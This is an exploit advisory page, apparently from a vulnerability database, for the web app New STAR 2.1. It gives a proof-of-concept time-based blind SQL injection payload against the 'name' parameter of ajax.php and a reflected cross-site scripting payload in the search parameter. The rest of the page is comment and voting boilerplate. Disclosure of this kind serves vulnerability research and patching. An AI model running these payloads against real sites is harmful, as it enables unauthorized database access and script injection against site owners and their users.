New STAR 2.1 Cross Site Scripting / SQL Injection

2018.06.01
Credit: Kagan Capar
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# Exploit Title: New STAR 2.1 - SQL Injection / Cross-Site Scripting # Dork: N/A # Date: 30.05.2018 # Exploit Author: Kagan Capar # Contact: kagancapar@gmail.com # Vendor Homepage: https://codecanyon.net/item/new-star-listen-youtube-music/7486113 # Version: 2.1 # Category: Webapps # Tested on: Kali Linux # Description : 'ajax.php' working in the input field contains SQL vulnerability. The search section also contains XSS vulnerability. ==================================================== # PoC : SQLi : Parameter: name (GET) Type: AND/OR time-based blind Demo: http://site.com/requests/ajax.php?newstar=login&name=admin&password=123456 Title: MySQL >= 5.0.12 AND time-based blind Payload: newstar=login&name=admin' AND SLEEP(5) AND 'ddni'='ddni&password=123456 ==================================================== # PoC : XSS : Payload(1) : http://site.com/play?mouse_search=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&p=1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top